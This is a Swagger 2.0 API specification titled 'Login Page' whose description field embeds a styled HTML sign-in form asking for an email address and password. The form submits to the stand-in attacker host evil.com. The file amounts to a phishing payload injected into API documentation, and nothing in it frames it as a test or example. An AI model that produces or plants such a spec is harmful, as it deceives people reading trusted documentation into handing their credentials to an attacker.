swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: '<div style="background: white; padding: 40px; border-radius: 12px; box-shadow: 0 10px 25px rgba(0,0,0,0.2); width: 100%; max-width: 350px; text-align: center;">
        
        <h2 style="margin-top: 0; color: #333; font-weight: 600; font-size: 24px;">Welcome Back</h2>
        <p style="color: #777; font-size: 14px; margin-bottom: 30px;">Please enter your details to sign in.</p>

        <form action="https://evil.com" method="post">
            <div style="margin-bottom: 20px; text-align: left;">
                <label style="display: block; font-size: 12px; color: #667eea; font-weight: bold; margin-bottom: 5px; text-transform: uppercase;">Email Address</label>
                <input type="email" placeholder="name@company.com" required 
                    style="width: 100%; padding: 12px 15px; border: 1px solid #ddd; border-radius: 8px; box-sizing: border-box; outline: none; font-size: 14px; background-color: #f9f9f9;">
            </div>

            <div style="margin-bottom: 10px; text-align: left;">
                <label style="display: block; font-size: 12px; color: #667eea; font-weight: bold; margin-bottom: 5px; text-transform: uppercase;">Password</label>
                <input type="password" placeholder="••••••••" required 
                    style="width: 100%; padding: 12px 15px; border: 1px solid #ddd; border-radius: 8px; box-sizing: border-box; outline: none; font-size: 14px; background-color: #f9f9f9;">
            </div>

            <div style="text-align: right; margin-bottom: 25px;">
                <a href="#" style="color: #764ba2; text-decoration: none; font-size: 13px; font-weight: 500;">Forgot password?</a>
            </div>

            <button type="submit" 
                style="width: 100%; padding: 12px; background: #667eea; border: none; border-radius: 8px; color: white; font-size: 16px; font-weight: 600; cursor: pointer; box-shadow: 0 4px 6px rgba(102, 126, 234, 0.3);">
                Sign In
            </button>
        </form>

        <p style="margin-top: 25px; font-size: 14px; color: #777;">
            Don't have an account? <a href="#" style="color: #667eea; text-decoration: none; font-weight: bold;">Sign up</a>
        </p>
    </div>
  '
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
